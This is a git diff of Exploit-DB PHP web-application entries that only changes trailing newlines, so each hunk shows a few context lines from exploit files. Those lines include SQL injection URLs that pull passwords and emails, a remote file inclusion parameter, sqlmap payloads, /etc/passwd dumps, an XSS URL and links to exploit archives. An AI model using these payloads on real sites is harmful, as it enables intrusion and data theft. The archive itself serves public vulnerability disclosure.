at end of file diff --git a/platforms/php/webapps/40278.txt b/platforms/php/webapps/40278.txt index 3e8ae05ca..a950d43e7 100755 --- a/platforms/php/webapps/40278.txt +++ b/platforms/php/webapps/40278.txt @@ -63,4 +63,4 @@ mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash -postfix:x:89:89::/var/spool/postfix:/sbin/nologin +postfix:x:89:89::/var/spool/postfix:/sbin/nologin \ No newline at end of file diff --git a/platforms/php/webapps/40285.txt b/platforms/php/webapps/40285.txt index c1c31232f..f4d47934a 100755 --- a/platforms/php/webapps/40285.txt +++ b/platforms/php/webapps/40285.txt @@ -55,4 +55,4 @@ References: https://packetstormsecurity.com/files/100568/Ocomon-2.0RC6-SQL-Injection.html http://www.cvedetails.com/cve/CVE-2005-4664/ -http://www.securityfocus.com/bid/15386/exploit +http://www.securityfocus.com/bid/15386/exploit \ No newline at end of file diff --git a/platforms/php/webapps/4029.php b/platforms/php/webapps/4029.php index a8b6dcb44..a70546b62 100755 --- a/platforms/php/webapps/4029.php +++ b/platforms/php/webapps/4029.php @@ -173,4 +173,4 @@ if (strstr($html,"w4ckw4ck")) ?> -# milw0rm.com [2007-06-04] +# milw0rm.com [2007-06-04] \ No newline at end of file diff --git a/platforms/php/webapps/40292.txt b/platforms/php/webapps/40292.txt index 0f5f83796..582b55230 100755 --- a/platforms/php/webapps/40292.txt +++ b/platforms/php/webapps/40292.txt @@ -69,7 +69,4 @@ Parameter: correct_answer (POST) --- [17:52:05] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu -web application technology: Apache 2.4.10 - - - +web application technology: Apache 2.4.10 \ No newline at end of file diff --git a/platforms/php/webapps/40293.txt b/platforms/php/webapps/40293.txt index c843e66cb..8208ad34c 100755 --- a/platforms/php/webapps/40293.txt +++ b/platforms/php/webapps/40293.txt @@ -44,5 +44,4 @@ http://127.0.0.1/vul_test/chatNow/login.php/95fb4">b5c
-
- + \ No newline at end of file diff --git a/platforms/php/webapps/40296.txt b/platforms/php/webapps/40296.txt index 82441fbc5..eaf34dee4 100755 --- a/platforms/php/webapps/40296.txt +++ b/platforms/php/webapps/40296.txt @@ -132,5 +132,4 @@ apache:x:48:48:Apache:/var/www:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin prosody:x:496:495::/var/lib/prosody:/sbin/nologin -tcpdump:x:72:72::/:/sbin/nologin - +tcpdump:x:72:72::/:/sbin/nologin \ No newline at end of file diff --git a/platforms/php/webapps/4030.php b/platforms/php/webapps/4030.php index 676384a0d..20a295fce 100755 --- a/platforms/php/webapps/4030.php +++ b/platforms/php/webapps/4030.php @@ -82,4 +82,4 @@ print " http://www.w4ck1ng.com\r\n"; print " ...Silentz\r\n"; print "-------------------------------------------------------------------------\r\n"; -# milw0rm.com [2007-06-04] +# milw0rm.com [2007-06-04] \ No newline at end of file diff --git a/platforms/php/webapps/4031.txt b/platforms/php/webapps/4031.txt index 12ee6051f..9ecb373a6 100755 --- a/platforms/php/webapps/4031.txt +++ b/platforms/php/webapps/4031.txt @@ -19,4 +19,4 @@ exploit: http://www.example.com/[patch]lib/addressbook.php?GLOBALS[basedir]=shell.txt? -# milw0rm.com [2007-06-04] +# milw0rm.com [2007-06-04] \ No newline at end of file diff --git a/platforms/php/webapps/40338.txt b/platforms/php/webapps/40338.txt index 67115972a..f034be8b8 100755 --- a/platforms/php/webapps/40338.txt +++ b/platforms/php/webapps/40338.txt @@ -184,4 +184,4 @@ closeClass=hidePopups"> Method: GET http://[Site]/phpipam/?page=tools§ion=changelog&subnetId=a&sPage=50"> -http://[Site]/phpipam/?page=tools§ion=changelog&subnetId=a"> +http://[Site]/phpipam/?page=tools§ion=changelog&subnetId=a"> \ No newline at end of file diff --git a/platforms/php/webapps/4034.txt b/platforms/php/webapps/4034.txt index f22113428..c7667ab7a 100755 --- a/platforms/php/webapps/4034.txt +++ b/platforms/php/webapps/4034.txt @@ -33,4 +33,4 @@ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ -# milw0rm.com [2007-06-05] +# milw0rm.com [2007-06-05] \ No newline at end of file diff --git a/platforms/php/webapps/4035.txt b/platforms/php/webapps/4035.txt index 1c0b8faf9..477f17dcc 100755 --- a/platforms/php/webapps/4035.txt +++ b/platforms/php/webapps/4035.txt @@ -30,4 +30,4 @@ http://site.com/comic_paht/index.php?epi=-1 UNION SELECT password,1,1 FROM users e-Mail adress: http://site.com/comic_paht/index.php?epi=-1 UNION SELECT email,1,1 from users -# milw0rm.com [2007-06-05] +# milw0rm.com [2007-06-05] \ No newline at end of file diff --git a/platforms/php/webapps/40351.txt b/platforms/php/webapps/40351.txt index b65dd3d30..6badbd72e 100755 --- a/platforms/php/webapps/40351.txt +++ b/platforms/php/webapps/40351.txt @@ -37,4 +37,4 @@ By Ross Marks: http://www.rossmarks.co.uk admin change password page don't need old password, no csrf token just a simple POST request. admin password stored in md5 format unsalted cookies do NOT have "secure" or "HTTPonly" flags enabled -no csrf anywhere +no csrf anywhere \ No newline at end of file diff --git a/platforms/php/webapps/40353.py b/platforms/php/webapps/40353.py index 162ae3489..decd1b500 100755 --- a/platforms/php/webapps/40353.py +++ b/platforms/php/webapps/40353.py @@ -53,4 +53,4 @@ def main(): print '='*25 + url + '='*25 for userid in ids: exploit(url,userid) -main() +main() \ No newline at end of file diff --git a/platforms/php/webapps/4036.php b/platforms/php/webapps/4036.php index 5f84cf108..3e814a806 100755 --- a/platforms/php/webapps/4036.php +++ b/platforms/php/webapps/4036.php @@ -209,4 +209,4 @@ if (strstr($html,"w4ckw4ck")) ?> -# milw0rm.com [2007-06-06] +# milw0rm.com [2007-06-06] \ No newline at end of file diff --git a/platforms/php/webapps/40364.txt b/platforms/php/webapps/40364.txt index 82f6ed364..f45ac6c25 100755 --- a/platforms/php/webapps/40364.txt +++ b/platforms/php/webapps/40364.txt @@ -29,4 +29,4 @@ variable is not filtered properly } if($_GET["id"]){ $event = getCalendarByRange($_GET["id"]); //the variable is not filtered -properly +properly \ No newline at end of file diff --git a/platforms/php/webapps/4037.pl b/platforms/php/webapps/4037.pl index c9bd1bb9c..f398e941b 100755 --- a/platforms/php/webapps/4037.pl +++ b/platforms/php/webapps/4037.pl @@ -66,4 +66,4 @@ print "------------------------------------------------------------------------- print "\nExploit Failed...\n"; } -# milw0rm.com [2007-06-06] +# milw0rm.com [2007-06-06] \ No newline at end of file diff --git a/platforms/php/webapps/40388.html b/platforms/php/webapps/40388.html index 0e6298d90..da2458f89 100755 --- a/platforms/php/webapps/40388.html +++ b/platforms/php/webapps/40388.html @@ -56,6 +56,4 @@ rfi.submit(); - - - + \ No newline at end of file diff --git a/platforms/php/webapps/4039.txt b/platforms/php/webapps/4039.txt index 6f79255b5..5a4f45615 100755 --- a/platforms/php/webapps/4039.txt +++ b/platforms/php/webapps/4039.txt @@ -172,4 +172,4 @@ Ya se creo un zip con los archivos vulnerables ya reparados [ xmlrpc.php, wp-adm :: [Slappter] :: */ -# milw0rm.com [2007-06-06] +# milw0rm.com [2007-06-06] \ No newline at end of file diff --git a/platforms/php/webapps/40390.php b/platforms/php/webapps/40390.php index a4d5fb378..825c81fca 100755 --- a/platforms/php/webapps/40390.php +++ b/platforms/php/webapps/40390.php @@ -24,5 +24,4 @@ - - + \ No newline at end of file diff --git a/platforms/php/webapps/40401.txt b/platforms/php/webapps/40401.txt index 719f65173..51efaed9e 100755 --- a/platforms/php/webapps/40401.txt +++ b/platforms/php/webapps/40401.txt @@ -39,4 +39,4 @@ else { print "Exploit $target FAILED!\n[!].$request->status_line.\n"; exit(); -} +} \ No newline at end of file diff --git a/platforms/php/webapps/4041.htm b/platforms/php/webapps/4041.htm index 367f6e8d2..60b424397 100755 --- a/platforms/php/webapps/4041.htm +++ b/platforms/php/webapps/4041.htm @@ -78,4 +78,4 @@ Exploit -# milw0rm.com [2007-06-07] +# milw0rm.com [2007-06-07] \ No newline at end of file diff --git a/platforms/php/webapps/40412.txt b/platforms/php/webapps/40412.txt index 377f8984a..c4722de85 100755 --- a/platforms/php/webapps/40412.txt +++ b/platforms/php/webapps/40412.txt @@ -88,4 +88,4 @@ warranties or guarantees of fitness of use or otherwise. XIII. ABOUT ------------------------- Manuel Garcia Cardenas -Pentester +Pentester \ No newline at end of file diff --git a/platforms/php/webapps/40416.txt b/platforms/php/webapps/40416.txt index eeb973a27..3f37bb5dd 100755 --- a/platforms/php/webapps/40416.txt +++ b/platforms/php/webapps/40416.txt @@ -44,5 +44,4 @@ Parameter: id (GET) Payload: id=MM57711' AND SLEEP(5) AND 'AgXd'='AgXd --- -###################### - +###################### \ No newline at end of file diff --git a/platforms/php/webapps/40469.txt b/platforms/php/webapps/40469.txt index d1010c128..15fd9b26f 100755 --- a/platforms/php/webapps/40469.txt +++ b/platforms/php/webapps/40469.txt @@ -40,5 +40,4 @@ Parameter: newid (GET) web application technology: Nginx back-end DBMS: MySQL >= 5.0.12 -###################### - +###################### \ No newline at end of file diff --git a/platforms/php/webapps/40475.txt b/platforms/php/webapps/40475.txt index 11d9b2a59..8fdbd6f37 100755 --- a/platforms/php/webapps/40475.txt +++ b/platforms/php/webapps/40475.txt @@ -63,4 +63,4 @@ method="POST"> -- -Besim ALTiNOK +Besim ALTiNOK \ No newline at end of file diff --git a/platforms/php/webapps/40480.txt b/platforms/php/webapps/40480.txt index 68ed3f2d1..857a004da 100755 --- a/platforms/php/webapps/40480.txt +++ b/platforms/php/webapps/40480.txt @@ -34,5 +34,4 @@ document.forms[0].submit(); -######################################## - +######################################## \ No newline at end of file diff --git a/platforms/php/webapps/40481.txt b/platforms/php/webapps/40481.txt index e500224cb..c5a0751e6 100755 --- a/platforms/php/webapps/40481.txt +++ b/platforms/php/webapps/40481.txt @@ -84,4 +84,4 @@ Install the latest version of ShoreTel Connect ONSITE https://support.shoretel.com/kb/view.php?id=kA41A000000XgL6SAK Related ShoreTel security bulletin: -https://support.shoretel.com/kb/view.php?id=kA41A000000XgL6SAK +https://support.shoretel.com/kb/view.php?id=kA41A000000XgL6SAK \ No newline at end of file diff --git a/platforms/php/webapps/40486.txt b/platforms/php/webapps/40486.txt index 917b242bf..7d591fd72 100755 --- a/platforms/php/webapps/40486.txt +++ b/platforms/php/webapps/40486.txt @@ -32,4 +32,4 @@ -#################################################################### +#################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/40487.txt b/platforms/php/webapps/40487.txt index 84367b008..cdeb09e57 100755 --- a/platforms/php/webapps/40487.txt +++ b/platforms/php/webapps/40487.txt @@ -17,6 +17,4 @@ http://site_name/phppressrelease/administration.php?pageaction=newrelease Stored XSS Payload : -http://www.site_name/phppressrelease/administration.php?pageaction=saverelease&subaction=submit&dateday=&datemonthnewedit=&dateyearnewedit=&title=&comment_user_email=besimweptest@yopmail.com&comment_text=Besim&captcha_code=DKF8&btnSubmitPC=Publish your comment -############ ###################### +############ ###################### \ No newline at end of file diff --git a/platforms/php/webapps/40506.html b/platforms/php/webapps/40506.html index 7cfe7abaf..57b70e24d 100755 --- a/platforms/php/webapps/40506.html +++ b/platforms/php/webapps/40506.html @@ -152,4 +152,4 @@ onclick="submitRequest();" /> -#################################################################### +#################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/40511.txt b/platforms/php/webapps/40511.txt index 0a89865d8..942ade064 100755 --- a/platforms/php/webapps/40511.txt +++ b/platforms/php/webapps/40511.txt @@ -9,5 +9,4 @@ ################################################################ PoC : http://localhost/cms/categorizator/vote.php?id_site=1' -################################################################ - +################################################################ \ No newline at end of file diff --git a/platforms/php/webapps/40513.txt b/platforms/php/webapps/40513.txt index 27d1622a3..66bf3e4c3 100755 --- a/platforms/php/webapps/40513.txt +++ b/platforms/php/webapps/40513.txt @@ -15,4 +15,4 @@ [Table] om_utilisateur [Columns] login,pwd {POST} "/opencimetiere/scr/login.php", "login.action.connect=Se%20connecter&came_from=&login=[SQLi]&password=paSSw0rd" -################################################################ +################################################################ \ No newline at end of file diff --git a/platforms/php/webapps/40516.txt b/platforms/php/webapps/40516.txt index 8a18599bc..546f888aa 100755 --- a/platforms/php/webapps/40516.txt +++ b/platforms/php/webapps/40516.txt @@ -34,4 +34,4 @@ comment_id= ############ ########## ############ -*-* Thanks Meryem AKDOĞAN *-* +*-* Thanks Meryem AKDOĞAN *-* \ No newline at end of file diff --git a/platforms/php/webapps/40517.html b/platforms/php/webapps/40517.html index 880d6449f..f733156ab 100755 --- a/platforms/php/webapps/40517.html +++ b/platforms/php/webapps/40517.html @@ -50,4 +50,4 @@ ############ ########## ############ -*-* Thanks Meryem AKDOĞAN *-* +*-* Thanks Meryem AKDOĞAN *-* \ No newline at end of file diff --git a/platforms/php/webapps/40518.txt b/platforms/php/webapps/40518.txt index 4e9ae5b70..c013ddde7 100755 --- a/platforms/php/webapps/40518.txt +++ b/platforms/php/webapps/40518.txt @@ -47,4 +47,4 @@ ================================================================================ # Discovered By : Ehsan Hosseini -================================================================================ +================================================================================ \ No newline at end of file diff --git a/platforms/php/webapps/40519.txt b/platforms/php/webapps/40519.txt index 457ca8654..08b563982 100755 --- a/platforms/php/webapps/40519.txt +++ b/platforms/php/webapps/40519.txt @@ -33,4 +33,4 @@ order by 999-- ' . Error: Unknown column '999' in 'order clause' Result of payload: Error: Unknown column '999' in 'order clause' ===================================================== # Discovered By : Ehsan Hosseini -===================================================== +===================================================== \ No newline at end of file diff --git a/platforms/php/webapps/40521.txt b/platforms/php/webapps/40521.txt index df3a6459a..69b99596b 100755 --- a/platforms/php/webapps/40521.txt +++ b/platforms/php/webapps/40521.txt @@ -17,6 +17,4 @@ $result=mysql_query("select title from stories where sid=$sid") *-* Vulnerable parameter-: $sid -*-* File-----------------: friend.php?sid=(SQL inj) - - +*-* File-----------------: friend.php?sid=(SQL inj) \ No newline at end of file diff --git a/platforms/php/webapps/40526.txt b/platforms/php/webapps/40526.txt index 03f2b36d0..87bf57a25 100755 --- a/platforms/php/webapps/40526.txt +++ b/platforms/php/webapps/40526.txt @@ -16,5 +16,4 @@ Description : *-* Vulnerable URL : http://site_name/path/single.php?kat=kat&url='post_name' --- Post comment section *-* Vuln. Parameter : adsoyad -*-* POST DATA : adsoyad=&email=besim@yopmail.com&web=example.com&mesaj=Nice, blog post - +*-* POST DATA : adsoyad=&email=besim@yopmail.com&web=example.com&mesaj=Nice, blog post \ No newline at end of file diff --git a/platforms/php/webapps/40531.txt b/platforms/php/webapps/40531.txt index 6ff1e4679..619790b49 100755 --- a/platforms/php/webapps/40531.txt +++ b/platforms/php/webapps/40531.txt @@ -27,4 +27,4 @@ id='' order by 100-- ' . Error: Unknown column '100' in 'order clause' Result of payload: Error: Unknown column '100' in 'order clause' ===================================================== # Discovered By : Ehsan Hosseini -===================================================== +===================================================== \ No newline at end of file diff --git a/platforms/php/webapps/40532.html b/platforms/php/webapps/40532.html index 1e7ed8acc..52a95c900 100755 --- a/platforms/php/webapps/40532.html +++ b/platforms/php/webapps/40532.html @@ -36,4 +36,4 @@ value="http://localhost/demo_forum.php" /> ===================================================== # Discovered By : Ehsan Hosseini ===================================================== ---> +--> \ No newline at end of file diff --git a/platforms/php/webapps/40534.html b/platforms/php/webapps/40534.html index 7ba354497..0a4c74709 100755 --- a/platforms/php/webapps/40534.html +++ b/platforms/php/webapps/40534.html @@ -95,4 +95,4 @@ Fix/Patch: Update to latest version. Regards, Arbin Godar -https://twitter.com/arbingodar +https://twitter.com/arbingodar \ No newline at end of file diff --git a/platforms/php/webapps/4054.php b/platforms/php/webapps/4054.php index 106caae64..f1f7e09a8 100755 --- a/platforms/php/webapps/4054.php +++ b/platforms/php/webapps/4054.php @@ -296,4 +296,4 @@ if (strstr($html,"w4ckw4ck")) ?> -# milw0rm.com [2007-06-08] +# milw0rm.com [2007-06-08] \ No newline at end of file diff --git a/platforms/php/webapps/4055.htm b/platforms/php/webapps/4055.htm index d5ca6980e..6e7371a6e 100755 --- a/platforms/php/webapps/4055.htm +++ b/platforms/php/webapps/4055.htm @@ -58,4 +58,4 @@ Exploit -# milw0rm.com [2007-06-09] +# milw0rm.com [2007-06-09] \ No newline at end of file diff --git a/platforms/php/webapps/40557.html b/platforms/php/webapps/40557.html index fd5510c28..f03b12669 100755 --- a/platforms/php/webapps/40557.html +++ b/platforms/php/webapps/40557.html @@ -55,4 +55,4 @@ http://site_name/phpnews/index.php?action=modifynewsposter3" method="POST"> -======================================== +======================================== \ No newline at end of file diff --git a/platforms/php/webapps/40575.html b/platforms/php/webapps/40575.html index 7f2e23d12..baa4b942b 100755 --- a/platforms/php/webapps/40575.html +++ b/platforms/php/webapps/40575.html @@ -155,5 +155,4 @@ Attacker can arbitrary file upload. -- -Besim ALTINOK - +Besim ALTINOK \ No newline at end of file diff --git a/platforms/php/webapps/40584.txt b/platforms/php/webapps/40584.txt index 9588c9954..81ed03329 100755 --- a/platforms/php/webapps/40584.txt +++ b/platforms/php/webapps/40584.txt @@ -74,4 +74,4 @@ EXAMPLE: Using the BINARY_PATH_NAME listed above as an example, an executable named "Program.exe" could be placed in "C:\", and it would be executed as the -Local System user next time the service was restarted. +Local System user next time the service was restarted. \ No newline at end of file diff --git a/platforms/php/webapps/4059.txt b/platforms/php/webapps/4059.txt index b7e36f87c..2392bbbb6 100755 --- a/platforms/php/webapps/4059.txt +++ b/platforms/php/webapps/4059.txt @@ -108,4 +108,4 @@ download the netcat+exploit from my server: http://corryl.altervista.org/index.php?mod=Download/Exploit#exploit-LRCF-v3.4.rar https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4059.rar (06112007-exploit-LRCF-v3.4.rar) -# milw0rm.com [2007-06-11] +# milw0rm.com [2007-06-11] \ No newline at end of file diff --git a/platforms/php/webapps/40594.txt b/platforms/php/webapps/40594.txt index a821e0e94..54aa83c4e 100755 --- a/platforms/php/webapps/40594.txt +++ b/platforms/php/webapps/40594.txt @@ -27,4 +27,4 @@ query error: SELECT * FROM pa_ecal_calendars WHERE cal_id='1' order by Result of payload: Error: Unknown column '20' in 'order clause' ===================================================== # Discovered By : Ehsan Hosseini -===================================================== +===================================================== \ No newline at end of file diff --git a/platforms/php/webapps/406.pl b/platforms/php/webapps/406.pl index 79f4f2889..cffd92a57 100755 --- a/platforms/php/webapps/406.pl +++ b/platforms/php/webapps/406.pl @@ -58,4 +58,4 @@ print "\n"; close $remote; -# milw0rm.com [2004-08-20] +# milw0rm.com [2004-08-20] \ No newline at end of file diff --git a/platforms/php/webapps/40612.txt b/platforms/php/webapps/40612.txt index 982587818..ccc927a3b 100755 --- a/platforms/php/webapps/40612.txt +++ b/platforms/php/webapps/40612.txt @@ -9,4 +9,4 @@ # Proof of Concept SQL Injection/Exploit : http://localhost/[PATH]/category-view-list.php?srch=PoC%27 -*----------------------------------------------------------------------------------------------------------------------* +*----------------------------------------------------------------------------------------------------------------------* \ No newline at end of file diff --git a/platforms/php/webapps/40614.py b/platforms/php/webapps/40614.py index a9c34325a..b0ea83ede 100755 --- a/platforms/php/webapps/40614.py +++ b/platforms/php/webapps/40614.py @@ -109,4 +109,4 @@ if __name__ == '__main__': print('\nIf you saw the message "sudo: no tty present and no askpass program specified", please try again and it may work.') except Exception as e: print(e) - print('\nSee above error') + print('\nSee above error') \ No newline at end of file diff --git a/platforms/php/webapps/4062.pl b/platforms/php/webapps/4062.pl index 25fa5f208..b5dc85fb5 100755 --- a/platforms/php/webapps/4062.pl +++ b/platforms/php/webapps/4062.pl @@ -49,4 +49,4 @@ if ($answer =~/([0-9a-fA-F]{32})/){print "\n[+] Admin Hash : $1\n";} else{print "\n[-] Exploit Failed...\n";} -# milw0rm.com [2007-06-12] +# milw0rm.com [2007-06-12] \ No newline at end of file diff --git a/platforms/php/webapps/40620.txt b/platforms/php/webapps/40620.txt index 2338b9033..c689b4f83 100755 --- a/platforms/php/webapps/40620.txt +++ b/platforms/php/webapps/40620.txt @@ -179,5 +179,4 @@ id=JFW996951 document.forms[0].submit(); - - + \ No newline at end of file diff --git a/platforms/php/webapps/40628.pl b/platforms/php/webapps/40628.pl index 3cee6f9cb..a8a977d61 100755 --- a/platforms/php/webapps/40628.pl +++ b/platforms/php/webapps/40628.pl @@ -85,5 +85,4 @@ end #}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}} #=========================== end -#=========================== - +#=========================== \ No newline at end of file diff --git a/platforms/php/webapps/4063.txt b/platforms/php/webapps/4063.txt index ec2deb116..5f6510aa7 100755 --- a/platforms/php/webapps/4063.txt +++ b/platforms/php/webapps/4063.txt @@ -16,4 +16,4 @@ Shoutz t0: all members of Hacking[dot]3xforum[dot]ro ,V1rg0 ,Str0ke Contact: splo1t[at]yahoo[dot]com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -# milw0rm.com [2007-06-12] +# milw0rm.com [2007-06-12] \ No newline at end of file diff --git a/platforms/php/webapps/40637.txt b/platforms/php/webapps/40637.txt index 64f1a846c..33b4b4a8b 100755 --- a/platforms/php/webapps/40637.txt +++ b/platforms/php/webapps/40637.txt @@ -37,4 +37,4 @@ $ ./joomraa.py -u hacker -p password -e hacker@example.com http://localhost:8080 Full Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40637.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40637.zip \ No newline at end of file diff --git a/platforms/php/webapps/4064.txt b/platforms/php/webapps/4064.txt index 6ab37c9fc..0dacb0279 100755 --- a/platforms/php/webapps/4064.txt +++ b/platforms/php/webapps/4064.txt @@ -10,4 +10,4 @@ modules/horoscope/footer.php?xoopsConfig[root_path]= Emekli Heykır BeyazKurt - Neti bıraktım! Dönüşüm mükemmel olcak ;( -# milw0rm.com [2007-06-12] +# milw0rm.com [2007-06-12] \ No newline at end of file diff --git a/platforms/php/webapps/40641.txt b/platforms/php/webapps/40641.txt index ea56b173d..6eacbe37b 100755 --- a/platforms/php/webapps/40641.txt +++ b/platforms/php/webapps/40641.txt @@ -232,4 +232,4 @@ Line 96: Cross-Site Scripting (XSS) in 'echo' via '$Page' ----------------------------------------------------- Scan finished. Check results in scan_output.txt file. -lqwrm@zslab:~# +lqwrm@zslab:~# \ No newline at end of file diff --git a/platforms/php/webapps/40642.txt b/platforms/php/webapps/40642.txt index ae55b5516..79da69c19 100755 --- a/platforms/php/webapps/40642.txt +++ b/platforms/php/webapps/40642.txt @@ -386,4 +386,4 @@ echo "Leaving maintenance mode........OK" exit 0 ;; esac -done +done \ No newline at end of file diff --git a/platforms/php/webapps/40644.txt b/platforms/php/webapps/40644.txt index c200cf1f2..c08dbdad4 100755 --- a/platforms/php/webapps/40644.txt +++ b/platforms/php/webapps/40644.txt @@ -51,4 +51,4 @@ GET /PDUDetails_Ajax_Details.php GET /PDULog.php GET /PortSettings.php GET /production_test1.php ("backdoor") -GET /UploadEXE.php +GET /UploadEXE.php \ No newline at end of file diff --git a/platforms/php/webapps/40645.txt b/platforms/php/webapps/40645.txt index af27bb43b..555e4db22 100755 --- a/platforms/php/webapps/40645.txt +++ b/platforms/php/webapps/40645.txt @@ -139,4 +139,4 @@ PoC: javascript:document.cookie="Login=StrangerThings;expires=Sat, 09 Dec 2017 11:05:17 GMT" --- +-- \ No newline at end of file diff --git a/platforms/php/webapps/40646.txt b/platforms/php/webapps/40646.txt index a38ac4923..a44735821 100755 --- a/platforms/php/webapps/40646.txt +++ b/platforms/php/webapps/40646.txt @@ -50,4 +50,4 @@ PoC: - + \ No newline at end of file diff --git a/platforms/php/webapps/40650.txt b/platforms/php/webapps/40650.txt index f4855170f..905370f13 100755 --- a/platforms/php/webapps/40650.txt +++ b/platforms/php/webapps/40650.txt @@ -67,6 +67,4 @@ serendipity[action]=admin &serendipity[properties][access]=public &ignore_password= &serendipity[properties][entrypassword]= -&serendipity[change_author]=4 - - +&serendipity[change_author]=4 \ No newline at end of file diff --git a/platforms/php/webapps/40671.txt b/platforms/php/webapps/40671.txt index d4154333b..0c83dc89f 100755 --- a/platforms/php/webapps/40671.txt +++ b/platforms/php/webapps/40671.txt @@ -55,5 +55,4 @@ My Beautiful Daughter & My Wife Reference ------- -http://php.net/manual/en/function.mysql-real-escape-string.php - +http://php.net/manual/en/function.mysql-real-escape-string.php \ No newline at end of file diff --git a/platforms/php/webapps/40676.txt b/platforms/php/webapps/40676.txt index 31d598429..22efdaa67 100755 --- a/platforms/php/webapps/40676.txt +++ b/platforms/php/webapps/40676.txt @@ -82,5 +82,4 @@ http://localhost/mylittleforum-master/backup/ Author: ================== -Ashiyane Digital Security Team - +Ashiyane Digital Security Team \ No newline at end of file diff --git a/platforms/php/webapps/4068.txt b/platforms/php/webapps/4068.txt index 7f72abcf2..2e14e2b1f 100755 --- a/platforms/php/webapps/4068.txt +++ b/platforms/php/webapps/4068.txt @@ -17,4 +17,4 @@ Contact: splo1t[at]yahoo[dot]com Note: In some cases you will need to be authenticated. -# milw0rm.com [2007-06-13] +# milw0rm.com [2007-06-13] \ No newline at end of file diff --git a/platforms/php/webapps/40682.txt b/platforms/php/webapps/40682.txt index ff3f4c2f1..d931ecbdf 100755 --- a/platforms/php/webapps/40682.txt +++ b/platforms/php/webapps/40682.txt @@ -47,4 +47,4 @@ Timeline References ========== -https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities +https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities \ No newline at end of file diff --git a/platforms/php/webapps/4069.txt b/platforms/php/webapps/4069.txt index 8a992903d..a355cc721 100755 --- a/platforms/php/webapps/4069.txt +++ b/platforms/php/webapps/4069.txt @@ -34,4 +34,4 @@ # grumpy, and everyone else at g00ns.net ############################################################################################### -# milw0rm.com [2007-06-13] +# milw0rm.com [2007-06-13] \ No newline at end of file diff --git a/platforms/php/webapps/40692.html b/platforms/php/webapps/40692.html index 542dac14b..9509f9e6c 100755 --- a/platforms/php/webapps/40692.html +++ b/platforms/php/webapps/40692.html @@ -32,4 +32,4 @@ http://localhost/SweetRice-transfer.zip - + \ No newline at end of file diff --git a/platforms/php/webapps/4070.txt b/platforms/php/webapps/4070.txt index 618716e6e..296011761 100755 --- a/platforms/php/webapps/4070.txt +++ b/platforms/php/webapps/4070.txt @@ -35,4 +35,4 @@ # grumpy, and everyone else at g00ns.net ############################################################################################### -# milw0rm.com [2007-06-13] +# milw0rm.com [2007-06-13] \ No newline at end of file diff --git a/platforms/php/webapps/40700.html b/platforms/php/webapps/40700.html index 487ba7785..933341704 100755 --- a/platforms/php/webapps/40700.html +++ b/platforms/php/webapps/40700.html @@ -36,4 +36,4 @@ phpinfo();?> + --> \ No newline at end of file diff --git a/platforms/php/webapps/40705.html b/platforms/php/webapps/40705.html index e80bd0b13..b4c4460dc 100755 --- a/platforms/php/webapps/40705.html +++ b/platforms/php/webapps/40705.html @@ -24,4 +24,4 @@ We Dont need old user name and old password #################################################### ######### exploit by: Amir.ght ##################### -#################################################### +#################################################### \ No newline at end of file diff --git a/platforms/php/webapps/40706.txt b/platforms/php/webapps/40706.txt index 97e95cb3e..9ab04e7f8 100755 --- a/platforms/php/webapps/40706.txt +++ b/platforms/php/webapps/40706.txt @@ -55,4 +55,4 @@ Content-Disposition: form-data; name="time"\r\n Content-Disposition: form-data; name="upload"\r\n \r\n Upload\r\n ------------------------------92741037415004--\r\n +-----------------------------92741037415004--\r\n \ No newline at end of file diff --git a/platforms/php/webapps/40707.html b/platforms/php/webapps/40707.html index c965701d8..0a1a36021 100755 --- a/platforms/php/webapps/40707.html +++ b/platforms/php/webapps/40707.html @@ -39,4 +39,4 @@ #################################################################### -#-# Discovered by : Amir.ght +#-# Discovered by : Amir.ght \ No newline at end of file diff --git a/platforms/php/webapps/40708.html b/platforms/php/webapps/40708.html index 4a45ec619..963208668 100755 --- a/platforms/php/webapps/40708.html +++ b/platforms/php/webapps/40708.html @@ -33,4 +33,4 @@ admin password : 123456 #################################################### ######### exploit by: Amir.ght ##################### -#################################################### +#################################################### \ No newline at end of file diff --git a/platforms/php/webapps/4071.txt b/platforms/php/webapps/4071.txt index 37e980e2c..b22efd3c7 100755 --- a/platforms/php/webapps/4071.txt +++ b/platforms/php/webapps/4071.txt @@ -33,4 +33,4 @@ BY : o0xxdark0o PhpDocumentor directory is .htaccess'ed -# milw0rm.com [2007-06-14] +# milw0rm.com [2007-06-14] \ No newline at end of file diff --git a/platforms/php/webapps/40718.txt b/platforms/php/webapps/40718.txt index e5208a6a9..d422fd0cb 100755 --- a/platforms/php/webapps/40718.txt +++ b/platforms/php/webapps/40718.txt @@ -15,5 +15,4 @@ You can access to all mysql backup and download them from this directory. http://localhost/inc/mysql_backup and can access to website files backup from: -http://localhost/SweetRice-transfer.zip - +http://localhost/SweetRice-transfer.zip \ No newline at end of file diff --git a/platforms/php/webapps/40719.txt b/platforms/php/webapps/40719.txt index edd931e32..b07aa10dc 100755 --- a/platforms/php/webapps/40719.txt +++ b/platforms/php/webapps/40719.txt @@ -169,6 +169,4 @@ of vulnerability-lab team & the specific authors or managers. To record, list, m -- VULNERABILITY LABORATORY - RESEARCH TEAM -SERVICE: www.vulnerability-lab.com - - +SERVICE: www.vulnerability-lab.com \ No newline at end of file diff --git a/platforms/php/webapps/4072.txt 